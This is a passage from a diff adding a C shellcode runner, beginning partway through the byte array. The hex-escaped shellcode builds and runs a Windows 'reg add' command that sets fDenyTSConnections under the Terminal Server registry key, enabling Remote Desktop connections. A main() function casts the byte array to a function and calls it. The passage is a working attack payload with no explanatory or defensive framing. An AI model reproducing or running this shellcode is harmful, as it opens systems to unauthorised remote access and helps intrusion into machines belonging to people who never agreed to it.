+"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43" +"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76" +"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f" +"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f" +"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68" +"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61" +"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0"; + +int main(int argc, char **argv) +{ + int (*func)(); + func = (int(*)()) code; + (int)(*func)(); +} \ No newline at end of file